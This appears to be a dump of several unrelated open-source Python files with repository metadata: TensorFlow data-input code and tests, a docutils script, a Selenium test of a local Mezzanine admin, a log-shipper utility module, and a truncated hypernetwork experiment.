print('Execution time: ' + str(datetime.timedelta(seconds=end_time - start_time)))
| 33.671642 | 92 | 0.638741 |
4a1f6d8b313af7b94e9b2bf5801fd9c7f62535ac | 2,311 | py | Python | tensorflow/models/image/cifar10/cifar10_input_test.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 680 | 2016-12-03T14:38:28.000Z | 2022-02-16T04:06:45.000Z | tensorflow/models/image/cifar10/cifar10_input_test.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 38 | 2016-11-17T08:43:51.000Z | 2019-11-12T12:27:04.000Z | tensorflow/models/image/cifar10/cifar10_input_test.py | danielgordon10/tensorflow | 395cfc42ee3c5842f5383f4049674c012998b133 | [
"Apache-2.0"
] | 250 | 2016-12-05T10:37:17.000Z | 2022-03-18T21:26:55.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for cifar10 input."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from tensorflow.models.image.cifar10 import cifar10_input
class CIFAR10InputTest(tf.test.TestCase):
def _record(self, label, red, green, blue):
image_size = 32 * 32
record = bytes(bytearray([label] + [red] * image_size +
[green] * image_size + [blue] * image_size))
expected = [[[red, green, blue]] * 32] * 32
return record, expected
def testSimple(self):
labels = [9, 3, 0]
records = [self._record(labels[0], 0, 128, 255),
self._record(labels[1], 255, 0, 1),
self._record(labels[2], 254, 255, 0)]
contents = b"".join([record for record, _ in records])
expected = [expected for _, expected in records]
filename = os.path.join(self.get_temp_dir(), "cifar")
open(filename, "wb").write(contents)
with self.test_session() as sess:
q = tf.FIFOQueue(99, [tf.string], shapes=())
q.enqueue([filename]).run()
q.close().run()
result = cifar10_input.read_cifar10(q)
for i in range(3):
key, label, uint8image = sess.run([
result.key, result.label, result.uint8image])
self.assertEqual("%s:%d" % (filename, i), tf.compat.as_text(key))
self.assertEqual(labels[i], label)
self.assertAllEqual(expected[i], uint8image)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([result.key, result.uint8image])
if __name__ == "__main__":
tf.test.main()
| 34.492537 | 80 | 0.648204 |
4a1f6db005ec53654d0dc60c6f5f5be185a5fa0e | 664 | py | Python | Data/lambda/bin/rst2xml.py | Diegod96/AWS-Reddit-Application | 39830514ed02c88119ce4f6ff70b4fbb084db3ef | [
"MIT"
] | null | null | null | Data/lambda/bin/rst2xml.py | Diegod96/AWS-Reddit-Application | 39830514ed02c88119ce4f6ff70b4fbb084db3ef | [
"MIT"
] | null | null | null | Data/lambda/bin/rst2xml.py | Diegod96/AWS-Reddit-Application | 39830514ed02c88119ce4f6ff70b4fbb084db3ef | [
"MIT"
] | null | null | null | #!C:\Users\diego\development\AWS-Reddit-Application\Data\venv\Scripts\python.exe
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
| 27.666667 | 80 | 0.746988 |
4a1f6e4e20a11ee6e4af4880705c42205b9607e3 | 5,733 | py | Python | tf_tpu_models/official/detection/dataloader/input_reader.py | hrsma2i/kaggle-imaterialist2020-model | 7822b52f743afb3367a4448a303ac1ee0f869e1d | [
"Apache-2.0"
] | 2 | 2021-07-06T04:41:53.000Z | 2022-03-11T00:22:18.000Z | tf_tpu_models/official/detection/dataloader/input_reader.py | hrsma2i/kaggle-imaterialist2020-model | 7822b52f743afb3367a4448a303ac1ee0f869e1d | [
"Apache-2.0"
] | 7 | 2021-09-01T05:29:35.000Z | 2022-01-17T10:49:59.000Z | tf_tpu_models/official/detection/dataloader/input_reader.py | hrsma2i/kaggle-imaterialist2020-model | 7822b52f743afb3367a4448a303ac1ee0f869e1d | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Data loader and input processing."""
import tensorflow as tf
from dataloader import factory
from dataloader import mode_keys as ModeKeys
from ops import spatial_transform_ops
def transform_image_for_tpu(
batch_images, space_to_depth_block_size=1, transpose_images=True
):
"""Transforms batched images to optimize memory usage on TPU.
Args:
batch_images: Batched images in the shape [batch_size, image_height,
image_width, num_channel].
space_to_depth_block_size: As integer for space-to-depth block size. The
input image's height and width must be divisible by block_size. The block
size also needs to match the stride length of the first conv layer. See
go/auto-space-to-depth and tf.nn.space_to_depth.
transpose_images: Whether or not transpose image dimensions.
Returns:
transformed batched images.
"""
if space_to_depth_block_size > 1:
return spatial_transform_ops.fused_transpose_and_space_to_depth(
batch_images, space_to_depth_block_size, transpose_images
)
elif transpose_images:
# Transpose the input images from [N,H,W,C] to [H,W,C,N] since reshape on
# TPU is expensive.
return tf.transpose(a=batch_images, perm=[1, 2, 3, 0])
else:
return batch_images
class InputFn(object):
"""Input function for tf.Estimator."""
def __init__(self, file_pattern, params, mode, dataset_type="tfrecord"):
self._file_pattern = file_pattern
self._mode = mode
self._is_training = mode == ModeKeys.TRAIN
if dataset_type == "tfrecord":
self._dataset_fn = tf.data.TFRecordDataset
self._parser_fn = factory.parser_generator(params, mode)
else:
raise ValueError("Dataset type %s is not supported." % dataset_type)
self._transpose_input = params.train.transpose_input
self._space_to_depth_block_size = params.train.space_to_depth_block_size
def __call__(self, params):
batch_size = params["batch_size"]
dataset = tf.data.Dataset.list_files(
self._file_pattern, shuffle=self._is_training
)
if self._is_training:
dataset = dataset.repeat()
dataset = dataset.apply(
tf.data.experimental.parallel_interleave(
lambda file_name: self._dataset_fn(file_name).prefetch(1),
cycle_length=32,
sloppy=self._is_training,
)
)
if self._is_training:
dataset = dataset.shuffle(64)
# Parses the fetched records to input tensors for model function.
dataset = dataset.apply(
tf.data.experimental.map_and_batch(
self._parser_fn,
batch_size=batch_size,
num_parallel_batches=64,
drop_remainder=True,
)
)
dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
def _transform_fn(images, labels):
transformed_images = transform_image_for_tpu(
images, self._space_to_depth_block_size, self._transpose_input
)
return transformed_images, labels
if self._is_training:
dataset = dataset.map(_transform_fn, num_parallel_calls=64)
return dataset
class InputFnTest(object):
"""Input function for tf.Estimator."""
def __init__(self, file_pattern, params, mode, dataset_type="tfrecord"):
self._file_pattern = file_pattern
self._mode = mode
self._is_training = mode == ModeKeys.TRAIN
if dataset_type == "tfrecord":
self._dataset_fn = tf.data.TFRecordDataset
self._parser_fn = factory.parser_generator(params, mode)
else:
raise ValueError("Dataset type %s is not supported." % dataset_type)
self._transpose_input = params.train.transpose_input
self._space_to_depth_block_size = params.train.space_to_depth_block_size
def __call__(self, params):
batch_size = params["batch_size"]
dataset = tf.data.Dataset.list_files(self._file_pattern, shuffle=False)
if self._is_training:
dataset = dataset.repeat()
dataset = dataset.apply(self._dataset_fn)
# Parses the fetched records to input tensors for model function.
dataset = dataset.apply(
tf.data.experimental.map_and_batch(
self._parser_fn,
batch_size=batch_size,
num_parallel_batches=1,
drop_remainder=True,
)
)
def _transform_fn(images, labels):
transformed_images = transform_image_for_tpu(
images, self._space_to_depth_block_size, self._transpose_input
)
return transformed_images, labels
if self._is_training:
dataset = dataset.map(
_transform_fn, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return dataset
| 36.056604 | 81 | 0.651317 |
4a1f709edf528d3c85da18b3b4f20c4bdf130ea7 | 12,942 | py | Python | beaver/utils.py | Affirm/python-beaver | 5da2eba14c8420141f16f2728e67c0704b56f2a5 | [
"MIT"
] | null | null | null | beaver/utils.py | Affirm/python-beaver | 5da2eba14c8420141f16f2728e67c0704b56f2a5 | [
"MIT"
] | null | null | null | beaver/utils.py | Affirm/python-beaver | 5da2eba14c8420141f16f2728e67c0704b56f2a5 | [
"MIT"
] | 1 | 2018-05-11T19:47:44.000Z | 2018-05-11T19:47:44.000Z | # -*- coding: utf-8 -*-
import argparse
import glob2
import itertools
import logging
import logging.config
from logging.handlers import RotatingFileHandler
import platform
import re
import os
import os.path
import sys
import yaml
import json
import beaver
MAGIC_BRACKETS = re.compile('({([^}]+)})')
IS_GZIPPED_FILE = re.compile('.gz$')
REOPEN_FILES = 'linux' not in platform.platform().lower()
CAN_DAEMONIZE = sys.platform != 'win32'
cached_regices = {}
def parse_args(args=None):
epilog_example = """
Beaver provides an lightweight method for shipping local log
files to Logstash. It does this using either redis, stdin,
zeromq as the transport. This means you'll need a redis,
stdin, zeromq input somewhere down the road to get the events.
Events are sent in logstash's json_event format. Options can
also be set as environment variables.
Please see the readme for complete examples.
"""
parser = argparse.ArgumentParser(description='Beaver logfile shipper',
epilog=epilog_example,
formatter_class=argparse.RawDescriptionHelpFormatter)
# Configures file location of beaver ini formatted config file.
parser.add_argument('-c', '--configfile',
help='ini config file path',
dest='config',
default='/dev/null')
# Configures file location of conf.d directory.
parser.add_argument('-C', '--confd-path',
help='path to conf.d directory',
dest='confd_path',
default='/etc/beaver/conf.d')
# Debug flag for debug logging.
parser.add_argument('-d', '--debug',
help='enable debug mode',
dest='debug',
default=False,
action='store_true')
# Daemonize the application AKA fork the process and run it in the background.
parser.add_argument('-D', '--daemonize',
help='daemonize in the background',
dest='daemonize',
default=False,
action='store_true')
# Files to watch
parser.add_argument('-f', '--files',
help='space-separated filelist to watch, can include globs (*.log). Overrides --path argument',
dest='files',
default=None,
nargs='+')
# Transport format
parser.add_argument('-F', '--format',
help='format to use when sending to transport',
default=None,
dest='format',
choices=['json', 'msgpack', 'raw', 'rawjson', 'string', 'gelf'])
# hostname override for source host. In not provided defaults to socket.gethostname()
parser.add_argument('-H', '--hostname',
help='manual hostname override for source_host',
default=None,
dest='hostname')
# Bind or connect mode.
parser.add_argument('-m', '--mode',
help='bind or connect mode',
dest='mode',
default=None,
choices=['bind', 'connect'])
# Addition logfile to write output to.
parser.add_argument('-l', '--logfile',
'-o', '--output',
help='file to pipe output to (in addition to stdout)',
default=None,
dest='output')
# Path to log files.
parser.add_argument('-p', '--path',
help='path to log files',
default=None,
dest='path')
# Path to a pid file to store the currently running process when --daemonize is set.
parser.add_argument('-P', '--pid',
help='path to pid file',
default=None,
dest='pid')
# Which transport to use.
parser.add_argument('-t', '--transport',
help='log transport method',
dest='transport',
default=None,
choices=['kafka', 'mqtt', 'rabbitmq', 'redis', 'sns',
'sqs', 'kinesis', 'stdout', 'tcp', 'udp',
'zmq', 'http', 'file'])
# Print the version of beaver.
parser.add_argument('-v', '--version',
help='output version and quit',
dest='version',
default=False,
action='store_true')
# Use the machine's FQDN for source_host
parser.add_argument('--fqdn',
help='use the machine\'s FQDN for source_host',
dest='fqdn',
default=False,
action='store_true')
# Maximum bytes per log file when --logfile is provided for output logging. (Defaults to 64MB)
parser.add_argument('--max-bytes',
action='store',
dest='max_bytes',
type=int,
default=64 * 1024 * 1024,
help='Maximum bytes per a logfile.')
# Number of backup files to keep around when --logfile is provided for output logging.
parser.add_argument('--backup-count',
action='store',
dest='backup_count',
type=int,
default=1,
help='Maximum number of logfiles to backup.')
# A YAML, JSON, or configparser (.ini) formatted logging config to use.
# See https://docs.python.org/2/library/logging.config.html.
# A file ending with .yaml and .yml is parsed as yaml.
# A file ending with .json is parsed as json.
# A file ending in .cfg or anything else is parsed as a configparser format (.ini format)
parser.add_argument('--logging-config',
help='Path to a python logging config.',
default=None,
dest='logging_config')
args = parser.parse_args(args)
if args.config != "/dev/null":
args.config = os.path.realpath(args.config)
return args
def setup_custom_logger(name, args=None, output=None, formatter=None, debug=None, config=None, max_bytes=None, backup_count=None):
if args and args.logging_config:
logging_config = args.logging_config
if not os.path.exists(logging_config):
raise OSError("No such file {}".format(logging_config))
if not os.path.isfile(logging_config):
raise ValueError("Path {} must be a file not a directory.".format(logging_config))
if logging_config.endswith('.yml') or logging_config.endswith('.yaml'):
if sys.version_info[:2] <= (2, 6):
raise ValueError('yaml logging config is only supported with python versions >= 2.7.')
# Parse as YAML
with open(logging_config, 'r') as f:
dictionary = yaml.load(f.read())
logging.config.dictConfig(dictionary)
elif logging_config.endswith('.json'):
if sys.version_info[:2] <= (2, 6):
raise ValueError('json logging config is only supported with python versions >= 2.7.')
# Parse as JSON
with open(logging_config, 'r') as f:
dictionary = json.loads(f.read())
logging.config.dictConfig(dictionary)
else:
logging.config.fileConfig(logging_config)
return logging.getLogger(name)
# Anything past here means we don't have a logging config, so set up default logging.
logging.basicConfig()
logger = logging.getLogger(name)
logger.propagate = False
if logger.handlers:
logger.handlers = []
has_args = args is not None and type(args) == argparse.Namespace
if debug is None:
debug = has_args and args.debug is True
if not logger.handlers:
if formatter is None:
formatter = logging.Formatter('[%(asctime)s] %(levelname)-7s %(message)s')
if output is None and has_args:
if config and config.get('output'):
output = config.get('output')
else:
output = args.output
if output:
output = os.path.realpath(output)
if output is not None:
if has_args and backup_count is None:
backup_count = args.backup_count
if has_args and max_bytes is None:
max_bytes = args.max_bytes
if backup_count is not None and max_bytes is not None:
assert backup_count > 0
assert max_bytes > 0
ch = RotatingFileHandler(output, 'a', max_bytes, backup_count)
if formatter is not False:
ch.setFormatter(formatter)
logger.addHandler(ch)
else:
file_handler = logging.FileHandler(output)
if formatter is not False:
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
else:
handler = logging.StreamHandler()
if formatter is not False:
handler.setFormatter(formatter)
logger.addHandler(handler)
if debug:
logger.setLevel(logging.DEBUG)
if hasattr(logging, 'captureWarnings'):
logging.captureWarnings(True)
else:
logger.setLevel(logging.INFO)
if hasattr(logging, 'captureWarnings'):
logging.captureWarnings(False)
logger.debug('Logger level is {0}'.format(logging.getLevelName(logger.level)))
return logger
def version(args):
if args.version:
formatter = logging.Formatter('%(message)s')
logger = setup_custom_logger('beaver', args=args, formatter=formatter)
logger.info('Beaver {0}'.format(beaver.__version__))
sys.exit(0)
def eglob(path, exclude=None):
"""Like glob.glob, but supports "/path/**/{a,b,c}.txt" lookup"""
fi = itertools.chain.from_iterable
paths = list(fi(glob2.iglob(d) for d in expand_paths(path)))
if exclude:
cached_regex = cached_regices.get(exclude, None)
if not cached_regex:
cached_regex = cached_regices[exclude] = re.compile(exclude)
paths = [x for x in paths if not cached_regex.search(x)]
return paths
def expand_paths(path):
"""When given a path with brackets, expands it to return all permutations
of the path with expanded brackets, similar to ant.
>>> expand_paths('../{a,b}/{c,d}')
['../a/c', '../a/d', '../b/c', '../b/d']
>>> expand_paths('../{a,b}/{a,b}.py')
['../a/a.py', '../a/b.py', '../b/a.py', '../b/b.py']
>>> expand_paths('../{a,b,c}/{a,b,c}')
['../a/a', '../a/b', '../a/c', '../b/a', '../b/b', '../b/c', '../c/a', '../c/b', '../c/c']
>>> expand_paths('test')
['test']
>>> expand_paths('')
"""
pr = itertools.product
parts = MAGIC_BRACKETS.findall(path)
if not path:
return
if not parts:
return [path]
permutations = [[(p[0], i, 1) for i in p[1].split(',')] for p in parts]
return [_replace_all(path, i) for i in pr(*permutations)]
def _replace_all(path, replacements):
for j in replacements:
path = path.replace(*j)
return path
def multiline_merge(lines, current_event, re_after, re_before):
""" Merge multi-line events based.
Some event (like Python trackback or Java stracktrace) spawn
on multiple line. This method will merge them using two
regular expression: regex_after and regex_before.
If a line match re_after, it will be merged with next line.
If a line match re_before, it will be merged with previous line.
This function return a list of complet event. Note that because
we don't know if an event is complet before another new event
start, the last event will not be returned but stored in
current_event. You should pass the same current_event to
successive call to multiline_merge. current_event is a list
of lines whose belong to the same event.
"""
events = []
for line in lines:
if re_before and re_before.match(line):
current_event.append(line)
elif re_after and current_event and re_after.match(current_event[-1]):
current_event.append(line)
else:
if current_event:
events.append('\n'.join(current_event))
current_event.clear()
current_event.append(line)
return events
| 37.29683 | 130 | 0.559496 |
4a1f71afb360ebc6b8d8c71bfc6a1d37cf74d4b9 | 3,431 | py | Python | test/page_form.py | Dibyadarshan/mezzanine | 6bc046f086c70c1f6bda3458eafbbe2da54df0c8 | [
"BSD-2-Clause"
] | null | null | null | test/page_form.py | Dibyadarshan/mezzanine | 6bc046f086c70c1f6bda3458eafbbe2da54df0c8 | [
"BSD-2-Clause"
] | null | null | null | test/page_form.py | Dibyadarshan/mezzanine | 6bc046f086c70c1f6bda3458eafbbe2da54df0c8 | [
"BSD-2-Clause"
] | null | null | null | from selenium import webdriver
import time
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
driver = webdriver.Firefox(executable_path="/home/anmol/PycharmProjects/prg1/geckodriver-v0.24.0-linux64/geckodriver")
wait = WebDriverWait(driver, 10)
driver.implicitly_wait(10)
driver.get("http://127.0.0.1:8000/admin/login/?next=/admin/")
driver.maximize_window()
username = "demo"
password = "demo"
username_element = wait.until(EC.element_to_be_clickable((By.XPATH,"//*[@id='id_username']")))
username_element.send_keys(username)
password_element = wait.until(EC.element_to_be_clickable((By.XPATH,"//*[@id='id_password']")))
password_element.send_keys(password)
login = wait.until(EC.element_to_be_clickable((By.XPATH,'/html/body/div/div[2]/form/div[2]/input')))
login.click()
assert driver.current_url=="http://127.0.0.1:8000/admin/"
pages = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div/div[3]/div[1]/ul/li[1]/ul/li[1]/a')))
pages.click()
select_element = wait.until(
EC.element_to_be_clickable((By.XPATH, '/ html / body / div / div[4] / div / div[1] / select')))
select_element = Select(select_element);
select_element.select_by_index(2);
title = "form page"
content = "page form"
page_title = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="id_title"]')))
page_title.send_keys(title)
iframe = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="id_content_ifr"]')))
driver.switch_to.frame(iframe)
page_content = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/p')))
script = "arguments[0].insertAdjacentHTML('afterEnd', arguments[1])"
driver.execute_script(script, page_content, content)
driver.switch_to.default_content()
field = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="id_fields-0-label"]')))
field.send_keys("Field")
ff = wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'submit-row')))
driver.execute_script("arguments[0].style.visibility='hidden'", ff)
fieldValue = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="id_fields-0-field_type"]')))
fieldValue = Select(fieldValue)
fieldValue.select_by_visible_text("Single line text")
driver.execute_script("arguments[0].style.visibility='visible'", ff)
page_save = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[1]/div[4]/div/form/div/div[3]/input[1]')))
page_save.click()
bodyText = wait.until(EC.element_to_be_clickable((By.TAG_NAME, 'body')))
assert "successfully" in bodyText.text
open_page = wait.until(EC.element_to_be_clickable((By.LINK_TEXT, title)))
open_page.click()
view_site = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[1]/div[4]/div/ul/li[3]/a')))
view_site.click()
# print(driver.window_handles)
time.sleep(5)
window_before = driver.window_handles[0]
window_after = driver.window_handles[1]
driver.switch_to.window(window_after)
# fieldValue = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR,'#id_field_9')))
# fieldValue.send_keys("some value")
# time.sleep(5)
driver.switch_to.window(window_before)
log_out = wait.until(EC.element_to_be_clickable((By.LINK_TEXT,"Log out")))
log_out.click()
bodyText = wait.until(EC.element_to_be_clickable((By.TAG_NAME, 'body')))
assert "Logged out" in bodyText.text
driver.quit() | 49.014286 | 119 | 0.767706 |
4a1f73fb1501c63fea7314a403172eda52abaf46 | 6,694 | py | Python | regexbot.py | davidxiao93/regexbot | e9821f9c7e719214ac811fbef1d0b7b28dab7ab1 | [
"MIT"
] | null | null | null | regexbot.py | davidxiao93/regexbot | e9821f9c7e719214ac811fbef1d0b7b28dab7ab1 | [
"MIT"
] | null | null | null | regexbot.py | davidxiao93/regexbot | e9821f9c7e719214ac811fbef1d0b7b28dab7ab1 | [
"MIT"
] | null | null | null |
import time
import re
from slackclient import SlackClient
from sheetclient import SheetClient
import pprint
pp = pprint.PrettyPrinter(indent=4)
import random
RTM_READ_DELAY = 0.1 # 0.1 second delay between reading from RTM
MAX_LENGTH = 2048
SNIPPET_CHAR_THRESHOLD = 512
SNIPPET_LINE_THRESHOLD = 8
RETRY_SENDS = 10
class RegexBot:
def __init__(self, sheet_id, slack_bot_token):
self.sheet_client = SheetClient(sheet_id)
self.slack_client = SlackClient(slack_bot_token)
self.slack_bot_id = None
self.compiled_regex_list = []
def start(self):
print("Initialising regexes")
self.load_regexes()
if self.slack_client.rtm_connect(with_team_state=False):
print("Starter Bot connected and running!")
# Read bot's user ID by calling Web API method `auth.test`
self.starterbot_id = self.slack_client.api_call("auth.test")["user_id"]
while True:
self.handle_next_events(self.slack_client.rtm_read())
time.sleep(RTM_READ_DELAY)
else:
print("Connection failed. Exception traceback printed above.")
def load_regexes(self):
self.compiled_regex_list = []
self.sheet_client.clear_status()
raw_regex_list = self.sheet_client.get_regexes()
regex_dict = {}
compiled_regex_count = 0
self.sheet_client.update_status(["Checking"] * len(raw_regex_list))
message_list = []
for i, row in enumerate(raw_regex_list):
message = "Accepted"
if len(row) >= 2 and len(row[0].strip()) == 0 and len(row[1].strip()) == 0:
message = ""
elif len(row) < 2 or len(row[0].strip()) == 0 or len(row[1].strip()) == 0:
message = "Empty Cell"
elif len(row[0].strip()) > MAX_LENGTH or len(row[1].strip()) > MAX_LENGTH:
message = "Regex too long: " + str(len(row[0].strip())) + ", " + str(len(row[1].strip())) + ", maximum is " + str(MAX_LENGTH)
else:
source_regex = row[0].strip()
destination_regex = row[1].strip()
try:
compiled_regex = re.compile(source_regex)
if compiled_regex not in regex_dict:
regex_dict[compiled_regex] = []
compiled_regex_count += 1
regex_dict[compiled_regex].append(destination_regex)
except re.error as e:
message = "Error compiling regex"
message_list.append(message)
self.sheet_client.update_status(message_list)
for compiled_regex, destination_regexes in regex_dict.items():
self.compiled_regex_list.append((compiled_regex, destination_regexes))
def handle_response(self, response):
if response["ok"] is False and response["headers"]["Retry-After"]:
# The `Retry-After` header will tell you how long to wait before retrying
delay = int(response["headers"]["Retry-After"])
print("Rate limited. Retrying in " + str(delay) + " seconds")
time.sleep(delay)
return False
return True
def send_message(self, channel, message, is_plain, original_event):
thread_ts = None
if "thread_ts" in original_event:
thread_ts = original_event["thread_ts"]
if thread_ts is None:
if is_plain:
return self.slack_client.api_call(
"chat.postMessage",
channel=channel,
text=message
)
else:
return self.slack_client.api_call(
"files.upload",
channels=channel,
content=message
)
else:
if not is_plain:
message = "Cannot send Snippets in a Thread. This is a Slack limitation"
return self.slack_client.api_call(
"chat.postEphemeral",
channel=channel,
text=message,
user=original_event["user"]
)
else:
reply_broadcast = None
if "reply_broadcast" in original_event:
reply_broadcast = original_event["reply_broadcast"]
if reply_broadcast is None:
return self.slack_client.api_call(
"chat.postMessage",
channel=channel,
text=message,
thread_ts=thread_ts
)
else:
return self.slack_client.api_call(
"chat.postMessage",
channel=channel,
text=message,
thread_ts=thread_ts,
reply_broadcast=reply_broadcast
)
def retryable_send_message(self, channel, message, is_plain, original_event):
got_successful_response = False
attempts = 0
while not got_successful_response:
got_successful_response = self.handle_response(self.send_message(channel, message, is_plain, original_event))
if attempts > RETRY_SENDS:
print("Failed to send message after", RETRY_SENDS, "attempts!")
break
def handle_message(self, slack_event):
message_text = slack_event["text"]
message_channel = slack_event["channel"]
if message_text == "<@" + str(self.starterbot_id) + "> reload":
# If the exact message "@regexbot reload" is seen, then reload the regexes
self.load_regexes()
return
for source_regex, destination_regexes in self.compiled_regex_list:
try:
maybe_match = source_regex.search(message_text)
if maybe_match:
new_message = re.sub(source_regex, random.choice(destination_regexes), maybe_match.group(0))
is_plain_message = len(new_message) < SNIPPET_CHAR_THRESHOLD and len(new_message.split('\n')) < SNIPPET_LINE_THRESHOLD
self.retryable_send_message(message_channel, new_message, is_plain_message, slack_event)
return
except re.error as e:
print("Regex Error!", e)
continue
def handle_next_events(self, slack_events):
for event in slack_events:
if event["type"] == "message" and not "subtype" in event and "text" in event:
self.handle_message(event)
| 41.320988 | 141 | 0.569764 |
4a1f75b8394cc3784997c0c9de5174039d2953b3 | 17,728 | py | Python | code/learn_vs_true_loss_scatter.py | cpoptic/hypernet-hypertraining | 3a4fd37e021921d5426723d0782a9cb746f6e700 | [
"MIT"
] | 19 | 2018-03-23T22:33:56.000Z | 2021-05-12T05:15:44.000Z | code/learn_vs_true_loss_scatter.py | cpoptic/hypernet-hypertraining | 3a4fd37e021921d5426723d0782a9cb746f6e700 | [
"MIT"
] | 2 | 2021-01-26T23:51:08.000Z | 2021-01-27T02:31:44.000Z | code/learn_vs_true_loss_scatter.py | cpoptic/hypernet-hypertraining | 3a4fd37e021921d5426723d0782a9cb746f6e700 | [
"MIT"
] | 7 | 2018-08-19T13:54:57.000Z | 2021-05-04T07:52:08.000Z | # !/usr/bin/python
# -*- coding: utf-8 -*-
"""Run the main body of this code to execute experiments."""
from __future__ import absolute_import
from __future__ import print_function
import os
import os.path
import autograd.numpy as np
import autograd.numpy.random as npr
import pickle
from autograd import grad
from autograd.misc.flatten import flatten
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF
from code.plotting import create_figure_and_axs, setup_ax_and_save, full_extent
from code.optimizers import adam, opt_params
from code.data_loader import load_mnist
from code.neural_network import init_random_params, identity, nn_predict, pred_loss
def log_gaussian(weights, var):
"""Find the log probability of the weights given some centered, spherical Gaussian prior.
:param weights: The parameters ([[float]]) of the neural network.
:param var: The variance (positive float) of the Gaussian distribution.
:return: The log probability (float) of the weights of the neural network.
"""
norm_sum = 0.0
for i in range(10):
norm_sum += np.linalg.norm(weights[0][0][:, i] * np.exp(var[i]), 2)
return -norm_sum / 10.0
def experiment(train_data, valid_data, init_scale, num_iters_hypernet, step_size_hypernet, step_size, num_iters,
batch_size_data, global_seed=0):
"""Run the second experiment, which consists of fitting a hypernetwork, which outputs neural network parameters.
These neural network parameters try to fit the training data with some additional loss for the hyperparameters.
We try to optimize the hyperparameters given the learned neural network response through the hypernetwork.
We observe how the hypernetwork performs on the training and testing, by graphing it against the true loss.
The true loss is found by training a neural network to convergence at a discrete number of points.
:param train_data: The training data.
:param valid_data: The testing data.
:param init_scale: The scale (positive float) for the hypernetwork initialization.
:param num_iters_hypernet: The number of iterations (integer) to run the hypernetwork optimizer for.
:param step_size_hypernet: The step size (positive float) for the hypernetwork optimizer.
:param step_size: The step size (positive float) for the loss approximation optimizer.
:param num_iters: The number of iterations (integer) to run the optimization for.
:param batch_size_data: The number of data points (integer) for a batch.
:param global_seed: The seed (integer) to use when choosing a constant seed.
:return: None, but saves pictures.
"""
assert init_scale > 0
assert step_size_hypernet > 0, step_size > 0
assert num_iters > 0, num_iters_hypernet > 0
def hyper_loss(weights, hyper):
"""Find the loss for neural network that is dependant on the hyperparameter.
:param weights: The weights ([[float]]) of the neural network.
:param hyper: The hyperparameter (float) input to the hypernetwork.
:return: The loss (float) of network dependant on the hyperparameter.
"""
return -log_gaussian(weights, hyper)
train_inputs, train_targets = train_data
valid_inputs, valid_target = valid_data
batch_ind, feature_ind = 0, 1
elementary_input_size = np.shape(train_inputs)[feature_ind]
elementary_output_size = np.shape(train_targets)[feature_ind]
elementary_layer_sizes = [elementary_input_size, elementary_output_size]
num_hypers = 10 # The dimensionality of the hyperparameter space (integer).
batch_size_elementary = 100 # The number of elementary data points to sample (i.e not hyperparameters).
# Define neural network and function to turn a vector into its weight structure.
example_elementary_params = init_random_params(init_scale, elementary_layer_sizes, npr.RandomState(global_seed))
flat_elementary_params, unflatten_vector_to_network_weights = flatten(example_elementary_params)
num_elementary_params = len(flat_elementary_params)
rs_train = npr.RandomState(global_seed)
def train_objective(weights, hyper, seed):
"""The objective for training a neural network.
:param weights: The weights ([[float]]) of the neural network.
:param hyper: The hyperparameter (float) input to the hypernetwork.
:param seed: The seed (integer) for sampling.
:return: The training loss (float).
"""
idx = rs_train.randint(len(train_inputs) - batch_size_elementary)
return -pred_loss(weights, train_inputs[idx:idx+batch_size_elementary],
train_targets[idx:idx+batch_size_elementary]) + hyper_loss(weights, hyper)
def valid_objective(weights, hyper, seed):
"""The objective for validating a neural network.
:param weights: The weights ([[float]]) of the neural network.
:param hyper: The hyperparameter (float) input to the hypernetwork.
:param seed: The seed (integer) for sampling a hyperparameter.
:return: The validation loss (float).
"""
return -pred_loss(weights, valid_inputs, valid_target)
# TODO: Rename valid_objective to prediction loss, and move train objective into data generator block
pickle_name = 'learn_vs_true_loss_scatter.pickle'
if not os.path.isfile(pickle_name): # Train a neural network from scratch with different hyperparameter values.
real_step_size = 0.0001 # The step size to use to find the real loss (float).
real_num_iters = 1000 # The number of iterations to use to find the real loss (integer).
